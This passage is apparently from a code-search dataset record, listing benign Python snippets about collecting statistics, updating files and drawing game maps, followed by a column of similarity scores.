self.default = int(lines[1]) # デフォルト値\n for line in lines[2:]: # マップデータを読み込む\n line = line.rstrip() # 改行除去\n self.map.append([int(x) for x in list(line)])", "def update_metadata(self, file_id, metadata):\n pass", "def collectStat(self, thread):\n\t\t# update average page load time\n\t\tif self.updated_count == 0:\n\t\t\tself.average_time = thread.load_time\n\t\telse:\n\t\t\tself.average_time = (self.average_time * self.updated_count + thread.load_time) / (self.updated_count + 1)\n\t\t# update stitistics by HTTP code\n\t\tif thread.code not in self.code_statistics:\n\t\t\tself.code_statistics[thread.code] = 1 \n\t\telse:\n\t\t\tself.code_statistics[thread.code] += 1\n\t\t# update count of processed pages\n\t\tself.updated_count += 1", "def collectGeneralStats(stats: DocStats, service):\n # Call the data from the api.\n file_meta = service.files().get(fileId=stats.general.id).execute()\n # Load in file stats\n stats.general.name = file_meta.get('title')\n stats.general.link = file_meta.get('selfLink')\n stats.general.creationDate = file_meta.get('createdDate')\n\n stats.timeline.setTimelineStart(stats.general.creationDate)", "def update_info_when_add(descriptor, rel_path_from_repository,\n mtime, file_sha1_hash, index_dict):\n # If the file is already tracked, update it\n if rel_path_from_repository in index_dict.keys():\n # If the file is already up to date, no need to rewrite.\n if (mtime == index_dict[rel_path_from_repository][0]\n and\n file_sha1_hash == index_dict[rel_path_from_repository][2]):\n return\n # Move the file descriptor to the correct position\n lseek(descriptor, index_dict[rel_path_from_repository][5], 0)\n # Update the timestamp. 
current sha1 hash, add sha1 hash\n update_file_index(descriptor, \" \".join([mtime,\n file_sha1_hash,\n file_sha1_hash]), 0)\n # Else add a new index line.\n else:\n lseek(descriptor, 0, 2)\n add_new_index(descriptor, mtime, file_sha1_hash,\n rel_path_from_repository)", "def add_stats(self):\n units = self.get_unit_map()\n for metric in self.raw_metrics:\n unit, metric_type = units.get(metric, (DEFAULT_UNIT, DEFAULT_TYPE))\n if metric_type == \"counter\":\n # Unit/Second\n unit = \"/\".join((unit, \"Second\"))\n self.add_derive_value(metric, unit, self.raw_metrics[metric], rate=True)\n else:\n self.add_gauge_value(metric, unit, self.raw_metrics[metric])", "def refresh(self):\n f = open(self._filepath, 'r')\n self._raw_sysfs_data = f.read()\n f.close()\n self._process_raw_data()", "def update_player_on_map():\n \n # Get's a constructed whole line from get_map_line()\n # Splits it and writes it one by one\n # Colours red if user has compass, and has previously discovered that position\n\n positions = (59, 61, 63, 65, 67, 69, 71, 73, 75, 77) # x coords of map tiles\n \n for i in range(1, 11):\n mapline = get_map_line(i)\n \n for mapdot in range(0, 10): # Split map line into 10 parts, and write them one by one\n whole_map_pos = ((i * 10) - 10) + mapdot # Use i to iterate through all the map lines\n if DISCOVERED[whole_map_pos] == \"Y\": # Fancy maths, works well for 10 x 10 grid\n mvaddstr(i, 59 + (mapdot * 2), mapline[mapdot], color_pair(DISCOVERED_MAP_COLOUR))\n else:\n mvaddstr(i, 59 + (mapdot * 2), mapline[mapdot], color_pair(MAP_COLOUR)) \n \n if LAST_LINE_HAD_PLYR: # Write the players avatar, and colour the players spot \n mvaddstr(i, positions[ZBPP], \"U\", color_pair(PLAYER_COLOUR) | A_BOLD)", "def collect_stat(self):\n\n cnstat_dict, ratestat_dict = self.get_cnstat()\n self.cnstat_dict.update(cnstat_dict)\n self.ratestat_dict.update(ratestat_dict)", "def setStatiFile(self, filename):\n self.statiFile = filename", "def gather_sample(self, stat_file, collector=None):\n\n if not collector:\n collector = {}\n\n for line in stat_file:\n # Each line has a format of:\n # Tag: Value\n #\n # We parse out all lines looking like that and match the stats we care about.\n m = re.search(r\"^(\\w+):\\s*(\\d+)\", line)\n if m is None:\n continue\n\n field_name = m.group(1)\n int_value = int(m.group(2))\n # FDSize is not the same as the number of open file descriptors. 
Disable\n # for now.\n # if field_name == \"FDSize\":\n # self.print_sample(\"app.fd\", int_value)\n if field_name == \"VmSize\":\n collector.update({Metric(\"app.mem.bytes\", \"vmsize\"): int_value * 1024})\n elif field_name == \"VmPeak\":\n collector.update(\n {Metric(\"app.mem.bytes\", \"peak_vmsize\"): int_value * 1024}\n )\n elif field_name == \"VmRSS\":\n collector.update(\n {Metric(\"app.mem.bytes\", \"resident\"): int_value * 1024}\n )\n elif field_name == \"VmHWM\":\n collector.update(\n {Metric(\"app.mem.bytes\", \"peak_resident\"): int_value * 1024}\n )\n return collector", "def update_data():\n pass", "def test_cache_stats(self):\n data = {'a': 'b'}\n stats_file = self._write('stats.json', data)\n settings = {\n 'webpack.stats_file': stats_file,\n }\n state = WebpackState(settings)\n stats = state.load_stats(cache=True)\n self.assertEqual(data, stats)\n with open(stats_file, 'w') as ofile:\n json.dump({'b': 'c'}, ofile)\n second_stats = state.load_stats(cache=True)\n self.assertEqual(second_stats, stats)", "def update(self, game, squares):\n try:\n with open(self.filename, mode='r+') as file:\n # Update the next player\n file.seek(0)\n file.write(game.next_player)\n # Update for each square\n for square in squares:\n col = square[0]\n col_index = ord(col.lower()) - 97 # ord('a') is 97\n row = square[1]\n row_index = int(row) - 1\n offset = row_index * 8 + col_index + 1\n value = game.board.get_square(col, int(row))\n file.seek(offset)\n file.write(value)\n except IOError as err:\n print(f\"Error saving file with random-access: {err}\")\n # Save the entire state instead\n self.save(game)" ]
[ "0.63213795", "0.61827755", "0.57400024", "0.5537577", "0.5465735", "0.5393763", "0.5373763", "0.5370881", "0.53650606", "0.5338288", "0.5331641", "0.52704084", "0.52475107", "0.5246663", "0.51833093", "0.5156864", "0.51413554", "0.51362735", "0.5133316", "0.51267594", "0.5123115", "0.51035655", "0.5100884", "0.5093227", "0.5091473", "0.5091051", "0.508375", "0.50814193", "0.5079507", "0.50784093", "0.50640965", "0.5057132", "0.50468343", "0.50415003", "0.50350577", "0.503412", "0.5024211", "0.49826127", "0.4979995", "0.497806", "0.4963144", "0.49569637", "0.49560505", "0.4953075", "0.49497113", "0.49300376", "0.4929611", "0.49228117", "0.4913967", "0.49127495", "0.49100643", "0.49050447", "0.49042726", "0.48930392", "0.48845652", "0.48751447", "0.4874142", "0.48655567", "0.48463687", "0.4843439", "0.48401874", "0.4830347", "0.48296082", "0.48219237", "0.4816875", "0.4811973", "0.48081046", "0.4806155", "0.47876874", "0.4781558", "0.47807962", "0.47734734", "0.47732753", "0.47712442", "0.47699028", "0.47677642", "0.47650453", "0.4762008", "0.47569183", "0.47540924", "0.47530255", "0.47522298", "0.47464505", "0.47460207", "0.4742043", "0.4739398", "0.47393876", "0.4738502", "0.47336861", "0.4724303", "0.47209793", "0.47179773", "0.47082528", "0.47063133", "0.46906552", "0.4687887", "0.46856666", "0.46846065", "0.4683505", "0.46824375" ]
0.63252497
0
Find the tracking file for the given file. Returns the last path mentioned in the file via a tracking tag or the equivalent thirdparty path given the file's path. If there is no file in the default path and no files mentioned within the file exist, returns None. Normally the thirdparty path must exist. Passing |check_exist|=False will bypass this check when it is not desired. An additional check is enabled by passing |check_uses_tags|=True. In this case the given file MUST use either a file track tag or another modification tag before a tracking_path is returned. stats is a variable for keeping track of the status of the analyzer, which can be None.
def compute_tracking_path(stats, our_path, our_lines, do_lint_check=False,
                          check_exist=True, check_uses_tags=False):
  tracking_path = staging.get_default_tracking_path(our_path)
  base_matcher = re.compile(re.escape(FILE_TRACK_TAG) + r' "([^\"]+)"')
  tag_matcher = re.compile(re.escape(REGION_START_TAG))
  uses_any_tags = False
  next_lineno = 1
  for line in our_lines:
    if stats:
      stats['lineno'] = next_lineno
    match = base_matcher.search(line)
    if match:
      tracking_path = match.group(1)
      if not os.path.exists(tracking_path) and stats:
        show_error(stats, 'Mod tracking path does not exist:\n' + line)
      if next_lineno > MAX_ARC_TRACK_SEARCH_LINES:
        show_error(stats, 'Tracking not allowed on line > %d' %
                   MAX_ARC_TRACK_SEARCH_LINES)
      uses_any_tags = True
      break
    elif not uses_any_tags and tag_matcher.search(line):
      uses_any_tags = True
    next_lineno += 1
    if (not do_lint_check and (uses_any_tags or not check_uses_tags) and
        next_lineno > MAX_ARC_TRACK_SEARCH_LINES):
      break
  if not tracking_path:
    return None
  if check_uses_tags and not uses_any_tags:
    return None
  if check_exist and not os.path.exists(tracking_path):
    return None
  return tracking_path
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _findfile(self, path):\n\n # Build list of possible local file paths\n if not self._isurl(path):\n # Valid local paths\n filelist = self._possible_names(path)\n # Paths in self._destpath\n filelist += self._possible_names(self.abspath(path))\n else:\n # Cached URLs in self._destpath\n filelist = self._possible_names(self.abspath(path))\n # Remote URLs\n filelist = filelist + self._possible_names(path)\n\n for name in filelist:\n if self.exists(name):\n if self._isurl(name):\n name = self._cache(name)\n return name\n return None", "def _locate_from_cache_file():\n path_file = os.path.join(_get_temp_dir(), _config.pathfile)\n return _read_file(path_file) if os.path.isfile(path_file) else None", "def _resolve_file_or_none(context_dir, conf, conf_file, has_args=False):\n if not conf:\n return None\n base1 = os.path.expanduser(context_dir)\n base2 = os.path.expanduser(conf)\n path = os.path.join(base1, base2)\n path = os.path.abspath(path) # This resolves \"/../\"\n if not os.path.exists(path):\n raise Exception(\"File does not exist: '%s'. This was \"\n \"referenced in the file '%s'.\" % (path, conf_file))\n return path", "def lookup(file, category='undefined'):\n path = os.path.join(self.base_path, doc, file)\n existing_path = os.path.exists(path) and path\n link = doc+'/'+file\n self.log.debug(' %s file %s' % (category, existing_path or\n path+\" (not found)\"))\n return existing_path, link", "def find_cue_path(self, path, verbose=False):\n meta = {}\n if('.flaccuesplit.' not in path and not os.path.exists(path)):\n try:\n path, meta = self._track_cache[path]\n except (AttributeError, NameError, TypeError, KeyError):\n # Not caching or not yet cached.\n raw_path = path\n dir_path = self.clean_path(os.path.dirname(path))\n files = os.listdir(dir_path)\n for cue_file in files:\n if(os.path.splitext(cue_file)[1] == '.cue'):\n try:\n # Don't use verbose here. 
Overly spammy.\n to_add, metadata, to_remove = self.get_cue_files(os.path.join(dir_path, cue_file))\n base_path = os.path.basename(path)\n if(base_path in to_add):\n path = to_add[base_path]\n meta = metadata[base_path]\n break\n except Exception:\n print(f'Error parsing {cue_file}:', file=sys.stderr, flush=True)\n import traceback\n traceback.print_exc()\n try:\n self._track_cache[raw_path] = (path, meta)\n except (AttributeError, NameError, TypeError):\n # Not caching.\n pass\n if(verbose):\n print(f'{raw_path} -> {path}', flush=True)\n return path, meta", "def file_exists(file_ref, config):\n find_fn = _find_file(config)\n if _is_remote(file_ref):\n _, file_ref = _get_id_fname(file_ref)\n return find_fn(file_ref)", "def _getFileLocalOrPath(filename, pathenv):\n if os.path.exists(filename):\n log.info( \"Using local file %s\", filename)\n return filename\n\n pathlist = os.getenv(pathenv,'').split(os.pathsep)\n resolvedfilename = FindFile(filename, pathlist, os.R_OK)\n if resolvedfilename:\n return resolvedfilename\n\n log.fatal(\"No file %s found locally nor in %s\" % (filename, os.getenv('CORAL_DBLOOKUP_PATH')) )\n return None", "def find_file(filename):\n for i in list(_ctx.include_paths) + [ os.path.dirname(_ctx.filename) ]:\n full_path = os.path.join(i, filename)\n if os.path.exists(full_path):\n return full_path\n return filename # failure gets handled later on", "def _findfile(self, path):\n return DataSource._findfile(self, self._fullpath(path))", "def test_get_track_path_returns_file_path_if_track_is_file(self, example_group, monkeypatch):\n monkeypatch.setattr(\"src.music.utils.get_track_list_root_directory\", MagicMock(return_value=\"root/dir/\"))\n monkeypatch.setattr(\"src.music.utils.os.path.isfile\", lambda x: True)\n track_list = example_group.track_lists[0]\n track = track_list.tracks[0]\n track.file = \"file.mp3\"\n path = utils.get_track_path(example_group, track_list, track)\n assert path == \"root/dir/file.mp3\"", "def checkFilePath(self, filename, searchpath=[]):\n\t\tif filename is None:\n\t\t\treturn None\n\t\telif os.path.isfile(filename):\n\t\t\treturn filename\n\t\telse:\n\t\t\t# Append current dir to searchpath and try each in turn\n\t\t\tsearchpath.append(os.path.dirname(__file__))\n\t\t\t# print(searchpath)\n\t\t\tfor folder in searchpath:\n\t\t\t\tfilepath = os.path.join(folder, filename)\n\t\t\t\tif os.path.isfile(filepath):\n\t\t\t\t\treturn filepath\n\n\t\t# File not found\n\t\treturn None", "def locate(tgt_fpath, survey):\n flen = os.stat(tgt_fpath).st_size\n fpaths = survey.get(flen, ())\n if not fpaths:\n return None\n\n for fbase_path in fpaths:\n # print(' '*5, tgt_fpath, fbase_path)\n if not filecmp.cmp(tgt_fpath, fbase_path, shallow=True):\n continue # early reject, try other candidates\n if filecmp.cmp(tgt_fpath, fbase_path, shallow=False):\n # identically equal\n return fbase_path\n\n return None", "def find(self, relative_path):\n found = list(self.grep(relative_path, lazy=True))\n if found:\n return found[0]\n\n return None", "def find_file(file_name):\n if (pathlib.Path(file_name).resolve()):\n file_name = str(file_name)\n logging.info(f' found {file_name}.')\n return file_name\n else:\n logging.error(f' no file {file_name} found for processing.')\n sys.exit()", "def _find_config_file(self) -> str or None:\n import os\n\n for path in self.paths:\n path = os.path.expanduser(path)\n for extension in self.file_extensions:\n for file_name in self.file_names:\n file_path = os.path.join(path, \"{}.{}\".format(file_name, extension))\n if 
os.path.isfile(file_path):\n return file_path\n\n return None", "def stat_file(self, path, info):\n return {}", "def storage_find_report_file(self, report_id, filename):\n return self._get_queryset(report_id=report_id, filename=filename).get()", "def locate_file(self, filename):\n return locate_file(filename, self.observatory)", "def get_track_info(dirpath, f):\n filepath = os.path.join(dirpath, f)\n track = mutagen.File(filepath)\n if not track:\n if filepath.endswith('.mp3') or filepath.endswith('.m4a'):\n raise ValueError('Skipped an mp3 or an m4a')\n return None\n\n cover = find_cover(dirpath)\n if isinstance(track.tags, mutagen.id3.ID3):\n return get_track_info_mp3(filepath, track.tags, track.info, cover)\n if isinstance(track.tags, mutagen.mp4.MP4Tags):\n return get_track_info_mp4(filepath, track.tags, track.info, cover)\n if isinstance(track, mutagen.oggopus.OggOpus):\n return get_track_info_opus(filepath, track.tags, track.info, cover)\n raise ValueError(\"No parser for file format\")", "def GetResultFile(self):\n\n file_path = self.configfile.map['ResultFilePath']\n\n # Check if several entrie\n if file_path is not None:\n if len(file_path) > 1:\n warning(\n 'Many path for the result file are setted ({}), I will take the first one'\n .format(file_path))\n file_path = file_path[0]\n\n # If the storing file is elsewhere\n if file_path != \"#\":\n sys.path.insert(0, file_path)\n base = DBASE.open('Anna')\n\n if base is not None:\n return base\n else:\n error(\n 'Cannot find Anna file in {}'\n .format(file_path))\n return None\n\n else:\n base = DBASE.open('Anna')\n if base is not None:\n return base\n else:\n error(\n 'Cannot find Anna file in {}'\n .format(file_path))\n return None", "def get_reffile(self, refs, detector):\n for key in refs:\n if detector in key:\n return refs[key]\n self.logger.error(\"WARNING: no file found for detector {} in {}\"\n .format(detector, refs))", "def file_stat(self, file_path):", "def find_file(file_path=None, args=None, locations=DEFAULT_LOCATIONS,\n file_name='weewx.conf'):\n\n # Start by searching args (if available)\n if file_path is None and args:\n for i in range(len(args)):\n if not args[i].startswith('-'):\n file_path = args[i]\n del args[i]\n break\n\n if file_path is None:\n for directory in locations:\n # If this is a relative path, then prepend with the\n # directory this file is in:\n if not directory.startswith('/'):\n directory = os.path.join(os.path.dirname(__file__), directory)\n candidate = os.path.abspath(os.path.join(directory, file_name))\n if os.path.isfile(candidate):\n return candidate\n\n if file_path is None:\n raise IOError(\"Unable to find file '%s'. 
Tried directories %s\" %\n (file_name, locations))\n elif not os.path.isfile(file_path):\n raise IOError(\"%s is not a file\" % file_path)\n\n return file_path", "def _get_existing_path(self, file_path):\n test_files_location = self._resource_config.test_files_location\n search_order = [\n os.path.join(test_files_location or \"\", file_path),\n os.path.join(test_files_location or \"\", self.reservation_id, file_path),\n file_path,\n ]\n for path in search_order:\n if os.path.exists(path):\n return path\n raise BPRunnerException(\n self.__class__.__name__,\n 'File {} does not exists or \"Test Files Location\" attribute was not specified'.format(file_path),\n )", "def _find_tif_file(self):\n name = self.results_file.name[:-12] + \".tif\"\n try:\n tif_file = next(self.results_file.parent.glob(name))\n return tif_file\n except StopIteration:\n print(f\"Tif not found for {name}\")\n return None", "def _real_stat(self, path, _exception_for_missing_path=True):\n # Save for error message.\n original_path = path\n # Most code in this method is used to detect recursive link structures.\n visited_paths = set()\n while True:\n # Stat the link if it is one, else the file/directory.\n lstat_result = self._real_lstat(path, _exception_for_missing_path)\n if lstat_result is None:\n return None\n # If the file is not a link, the `stat` result is the same as the\n # `lstat` result.\n if not stat.S_ISLNK(lstat_result.st_mode):\n return lstat_result\n # If we stat'ed a link, calculate a normalized path for the file\n # the link points to.\n dirname, _ = self._path.split(path)\n path = self._path.join(dirname, lstat_result._st_target)\n path = self._path.abspath(self._path.normpath(path))\n # Check for cyclic structure.\n if path in visited_paths:\n # We had seen this path already.\n raise ftputil.error.RecursiveLinksError(\n \"recursive link structure detected for remote path '{}'\".format(\n original_path\n )\n )\n # Remember the path we have encountered.\n visited_paths.add(path)", "def try_stat(path: str) -> Optional[os.stat_result]:\n result = Stat._result(path, throw=False)\n if isinstance(result, BaseException):\n return None\n return result", "def find_file(path):\n return NotImplemented", "def _resolve_relative_path(filepath: str):\n if not filepath:\n return None\n\n inf_path = os.path.join(os.path.dirname(__file__), filepath)\n\n return inf_path", "def get_file(_file):\n _file = pathlib.Path(_file)\n if not _file.is_file():\n _file = None\n return _file", "def file_exists(self, path: str) -> Optional[GoogleDriveFile]:\n current_file = self.root\n file_name_list = self._normalized_path_list(path)\n normalized_file_path = \"/\".join(file_name_list)\n logging.info(f\"Checking if {normalized_file_path} exists...\")\n last_index = len(file_name_list) - 1\n for index, file_name in enumerate(file_name_list):\n if current_file.file_name != FileName(file_name):\n return None\n # If not the last item in the path, then get the next file in the path and assign as root\n if index < last_index:\n next_file_name = FileName(file_name_list[index + 1])\n next_file = current_file.get_child(next_file_name)\n # If not last item in path and sub-files don't contain the next item, path doesn't exist\n if next_file is None:\n return None\n current_file = next_file\n else:\n return current_file\n raise Exception(\"Not suppose to reach here. 
Check function file_exists\")", "def _get_rel_path(self, file_path: Union[str, os.PathLike]) -> Optional[str]:\n file_path = Path(file_path).absolute()\n try:\n # use os.path.relpath instead of Path.relative_to in case file_path is not a child of self.base_path\n return os.path.relpath(file_path, self.base_path)\n except ValueError:\n # 2 paths are on different drives\n return None", "def search_file(filename, search_path, pathsep=os.pathsep):\n for path in string.split(search_path, pathsep):\n candidate = os.path.join(path, filename)\n if os.path.exists(candidate): return os.path.abspath(candidate)\n return None", "def search_file(filename, search_path, pathsep=os.pathsep):\n for path in string.split(search_path, pathsep):\n candidate = os.path.join(path, filename)\n if os.path.exists(candidate): return os.path.abspath(candidate)\n return None", "def get(self, entity, default=None, check_tags=True):\n\n if not isinstance(entity, Entity):\n raise TypeError('path cache keys are entities; got %r %r' % (type(entity), entity))\n\n with self.conn:\n c = self.conn.cursor()\n c.execute('SELECT path FROM entity_paths WHERE entity_type = ? AND entity_id = ?', (entity['type'], entity['id']))\n row = c.fetchone()\n if row is None:\n return default\n path = os.path.abspath(os.path.join(self.project_root, row[0]))\n\n # Make sure that the entity is actually tagged in the given directory.\n # This guards against moving tagged directories. This does NOT\n # effectively guard against copied directories.\n if check_tags:\n if not any(tag['entity'] is entity for tag in self.sgfs.get_directory_entity_tags(path)):\n log.warning('%s %d is not tagged at %s' % (\n entity['type'], entity['id'], path,\n ))\n return default\n\n return path", "def GetTrackerFilePath(dst_url, tracker_file_type, api_selector, src_url=None):\n if tracker_file_type == TrackerFileType.UPLOAD:\n # Encode the dest bucket and object name into the tracker file name.\n res_tracker_file_name = (\n re.sub('[/\\\\\\\\]', '_', 'resumable_upload__%s__%s__%s.url' %\n (dst_url.bucket_name, dst_url.object_name, api_selector)))\n elif tracker_file_type == TrackerFileType.DOWNLOAD:\n # Encode the fully-qualified dest file name into the tracker file name.\n res_tracker_file_name = (\n re.sub('[/\\\\\\\\]', '_', 'resumable_download__%s__%s.etag' %\n (os.path.realpath(dst_url.object_name), api_selector)))\n elif tracker_file_type == TrackerFileType.PARALLEL_UPLOAD:\n # Encode the dest bucket and object names as well as the source file name\n # into the tracker file name.\n res_tracker_file_name = (\n re.sub('[/\\\\\\\\]', '_', 'parallel_upload__%s__%s__%s__%s.url' %\n (dst_url.bucket_name, dst_url.object_name,\n src_url, api_selector)))\n elif tracker_file_type == TrackerFileType.REWRITE:\n # Should use GetRewriteTrackerFilePath instead.\n raise NotImplementedError()\n\n return _HashAndReturnPath(res_tracker_file_name, tracker_file_type)", "def _find_file(self, name, check_dir='c_files'):\n testdir = os.path.dirname(__file__)\n name = os.path.join(testdir, check_dir, name)\n return name", "def find_real_dso_path(dso_path_in_record_file, binary_cache_path):\n if dso_path_in_record_file[0] != '/' or dso_path_in_record_file == '//anon':\n return None\n if binary_cache_path:\n tmp_path = os.path.join(binary_cache_path, dso_path_in_record_file[1:])\n if os.path.isfile(tmp_path):\n return tmp_path\n if os.path.isfile(dso_path_in_record_file):\n return dso_path_in_record_file\n return None", "def check_file(file: Path):\n if Path(file).is_file() or file == 
\"\":\n return file\n else:\n files = glob.glob(\"./**/\" + file, recursive=True) # find file\n FILE_NOT_FOUND_MSG = f\"File Not Found: {file}\"\n MULTIPLE_FILE_MSG = f\"Multiple files match '{file}', specify exact path:{files}\"\n\n assert len(files), FILE_NOT_FOUND_MSG # assert file was found\n assert len(files) == 1, MULTIPLE_FILE_MSG # assert unique\n return files[0] # return file", "def test_get_file_exists_caching_with_raw_url(self):\n repository = self.remote_repository\n\n self.spy_on(repository._get_file_exists_uncached,\n op=kgb.SpyOpReturn(True))\n\n # Use spy to put key into cache\n self.assertTrue(repository.get_file_exists('PATH', 'd7e96b3'))\n\n # Remove spy to ensure key is still in cache without needing spy\n repository._get_file_exists_uncached.unspy()\n self.assertTrue(repository.get_file_exists('PATH', 'd7e96b3'))\n\n # Does not exist when raw_file_url changed because it is not cached.\n repository.raw_file_url = \\\n 'http://github.com/api/v2/yaml/blob/show/reviewboard/<revision>'\n\n self.assertFalse(repository.get_file_exists('PATH', 'd7e96b3'))", "def get_file(file_info):\n if session_vars.filepath == file_info['filepath']:\n img_file = session_vars.img_file\n else:\n print('loading', file_info['filepath'])\n if file_info['ext']=='fits':\n print('Detected fits image type')\n pyfits = import_fits()\n img_file = pyfits.open(file_info['filepath'])\n else:\n try:\n from PIL import Image\n except ImportError:\n raise ToyzJobError(\n \"You must have PIL (Python Imaging Library) installed to \"\n \"open files of this type\"\n )\n img_file = Image.open(file_info['filepath'])\n session_vars.filepath = file_info['filepath']\n session_vars.img_file = img_file\n return img_file", "def get_file(self, path):\n return self._files.get(self._get_rel_path(path))", "def find_library_or_err(file):\r\n path = find_library(file)\r\n if not path:\r\n err = f\"could not find {file}\"\r\n messages.add(err)\r\n return None\r\n else:\r\n return path", "def find_axfile(name, search_path=[u\".\", u\"$GT3AXISDIR\", u\"$GTOOLDIR/gt3\"]):\n axis_path = map(os.path.expandvars, search_path)\n axis_path = [a for a in axis_path if a.find('$') < 0]\n axis_path = [a for a in axis_path if os.path.exists(a)]\n\n if (opt_debug):\n print('*** axis_path:')\n print(axis_path)\n\n axfile = None\n for axdir in axis_path:\n # print(axdir)\n axfile = os.path.join(axdir, 'GTAXLOC.'+name)\n if (os.path.exists(axfile)):\n break\n\n # print(\"dbg:find_axfile:\",axfile)\n return axfile", "def get_file_from_path(file_path):\n return Utils.get_real_file_path(file_path)", "def find_file(self, filename, pathlist = ['.']):\n if filename.startswith('http://') or filename.startswith('https://'):\n return (urlopen(filename), filename)\n for path in [''] + pathlist:\n filepath = abspath(path + '/' + filename)\n if isfile(filepath):\n f = open(filepath, 'r')\n return (f, filepath)\n raise FileNotFoundError(filename, pathlist)", "def get_file(self, path):\n b_file = self.get_b_file(path)\n if b_file:\n return b_file\n return self.get_a_file(path)", "def lookup(self, file, metadata={}):\n # Return a tuple (fingerprint time, lookup time, result)\n # Times should be in milliseconds\n raise NotImplementedError()", "def _find_file(config, startswith=False):\n remote_files = _get_remote_files(config)\n if startswith:\n remote_folders = {}\n for fname, (pid, _) in remote_files.items():\n remote_folders[os.path.dirname(fname)] = (pid, None)\n remote_files = remote_folders\n\n def glob_match(f1, f2):\n \"\"\"Check for wildcard glob style 
matches.\n \"\"\"\n if f1.find(\"*\") >= 0:\n if fnmatch.fnmatch(f2, \"*/%s\" % f1):\n return True\n\n def get_file(f):\n if _is_remote(f):\n f = _get_id_fname(f)[-1]\n # handle both bare lookups and project-prefixed\n if f.find(\":\") > 0:\n fproject, f = f.split(\":\")\n else:\n fproject = None\n # check for exact matches\n for project, folder in _remote_folders(config):\n if fproject is None or fproject == project:\n folder_f = os.path.join(folder, f)\n if folder_f in remote_files:\n pid, fid = remote_files[folder_f]\n return \"%s:%s/%s:%s\" % (KEY, fid, pid, folder_f)\n # find any files nested in sub folders or as globs\n out = []\n for project, folder in _remote_folders(config):\n for rfname, (pid, rid) in remote_files.items():\n if rfname.startswith(folder + \"/\") and (rfname.endswith(\"/\" + f) or glob_match(f, rfname)):\n out.append(\"%s:%s/%s:%s\" % (KEY, rid, pid, rfname))\n if len(out) == 1:\n return out[0]\n elif len(out) > 1:\n return out\n return get_file", "def find_in_app(self, app, path):\n storage = self.storages.get(app)\n if storage:\n # only try to find a file if the source dir actually exists\n if storage.exists(path):\n matched_path = storage.path(path)\n if matched_path:\n return matched_path", "def __get_docker_file_path(path):\n if os.path.isfile(path):\n return path\n for dc_filename in DEFAULT_DC_FILENAMES:\n file_path = os.path.join(path, dc_filename)\n if os.path.isfile(file_path):\n return file_path\n # implicitly return None", "def track_path(self, filename):\n return os.path.join(os.path.dirname(__file__), 'testdata', filename)", "def track_path(self, filename):\n return os.path.join(os.path.dirname(__file__), 'testdata', filename)", "def track_path(self, filename):\n return os.path.join(os.path.dirname(__file__), 'testdata', filename)", "def find_metadata_file(diagnostics_dir, file_pattern, verbose=False):\n if not diagnostics_dir:\n return None\n metadata_dir = os.path.dirname(diagnostics_dir) + '/metadata'\n if not os.path.isdir(metadata_dir):\n if verbose:\n print(\"Unable to find metadata dir at\", metadata_dir)\n return None\n metafiles = sorted(glob.glob(metadata_dir+'/'+file_pattern))\n if len(metafiles) == 0:\n if verbose:\n print(\"Unable to find metdata file wiht pattern {} in {}\".format(file_pattern, metadata_dir))\n return None\n metadata_file = metafiles[0]\n return metadata_file", "def get_file(self, filename, handler=False):\n result = None\n if self.exists(filename):\n file_path = join_paths(self.path, filename)\n if handler:\n result = open(file_path, 'rb')\n else:\n result = file_path\n return result", "def version_file(self) -> Optional[Path]:\n for path in [self.path, self.path.parent]:\n test_path = path / TF_VERSION_FILENAME\n if test_path.is_file():\n LOGGER.debug(\"using version file: %s\", test_path)\n return test_path\n return None", "def info_file_path_abs(self) -> Path:\n return Path(self._repo.working_tree_dir, \"INFO.yaml\")", "def results_file(self, filename, check_exists=False):\n return self._file_in_subdir(self.results_dir, filename, check_exists)", "async def get_track(self) -> Optional[str]:\n ...", "def try_as_file(inp):\n file = pathlib.Path(inp)\n\n if not file.is_absolute():\n file = pathlib.Path.cwd() / file\n\n if not file.exists():\n return None\n\n try:\n # this will throw if it is a symlink that has a loop in it so that it\n # never points to a base file.\n if file.is_file():\n return file\n except OSError as ex:\n raise Except.FunctionError(\"resolving file '{}' failed: {}\".format(\n file, 
ex.strerror.lower() ) )\n return None", "def find_library(file):\r\n search_paths = [pathlib.Path(\"/usr/local/lib/x86_64-linux-gnu\"),\r\n pathlib.Path(\"/lib/x86_64-linux-gnu\"),\r\n pathlib.Path(\"/usr/lib/x86_64-linux-gnu\"),\r\n pathlib.Path(\"/usr/local/lib64\"),\r\n pathlib.Path(\"/lib64\"),\r\n pathlib.Path(\"/usr/lib64\"),\r\n pathlib.Path(\"/usr/local/lib\"),\r\n pathlib.Path(\"/lib\"),\r\n pathlib.Path(\"/usr/lib\"),\r\n pathlib.Path(\"/usr/x86_64-linux-gnu/lib64\"),\r\n pathlib.Path(\"/usr/x86_64-linux-gnu/lib\")]\r\n\r\n for path in search_paths:\r\n full = path.joinpath(file)\r\n if full.is_file():\r\n return str(full)\r\n return None", "def find_file(line, column, *, cwd=None):\n cwd = cwd or pathlib.Path()\n path = None\n for finder in finders:\n path, lineno = finder(line, column, cwd)\n if path is not None:\n break\n\n if path is None:\n return None, None\n else:\n return path, lineno", "def search_file(filename, search_path):\n file_path = None\n for path in search_path:\n if exists(join(path, filename)):\n file_path = path\n break\n if file_path:\n return abspath(join(file_path, filename))\n return None", "def test_get_track_path_raises_value_error_if_path_is_not_existing_file(self, example_group, monkeypatch):\n track_list = example_group.track_lists[0]\n track = track_list.tracks[0]\n track.file = \"file.mp3\"\n monkeypatch.setattr(\n \"src.music.utils.get_track_list_root_directory\", MagicMock(return_value=\"root/dir/\")\n ) # non-existing dir\n with pytest.raises(ValueError):\n utils.get_track_path(example_group, track_list, track)", "def getfilemeta(path):\n if os.path.isfile(path):\n meta = os.stat(path)\n return (meta)\n else:\n raise Exception('File not exist')", "def get_file_info_by_token(token):\n\n key = generate_access_token_cache_key(token)\n value = cache.get(key)\n if not value:\n logger.error('No wopi cache value when first get %s' % key)\n value = cache.get(key)\n\n return value if value else None", "def findFileForRun(self,run,time=0):\n graphid = 0\n if time:\n query = \"SELECT graphid FROM Version WHERE timeStamp=%s AND maxRunNumber>=%s AND minRunNumber<=%s\"%(time,run,run)\n tup = self.fetchOne(query)\n if tup and tup[0]:\n graphid = tup[0]\n\n\tquery = \"SELECT locationFileId FROM Location WHERE run=%s\"%(run)\n if graphid:\n query+=\" AND graphid=%s\"%graphid\n elif not graphid and time:\n print \"No matched timeStamp found, continue searching in all graphs.\"\n\ttup = self.fetchAll(query)\n print \"For given run %s\"%(run,)\n\tif not len(tup):\n\t print \"No files found\"\n\t return\n\tfor x in tup:\n\t locId = x[0]\n\t query = \"SELECT fileName FROM FileID WHERE 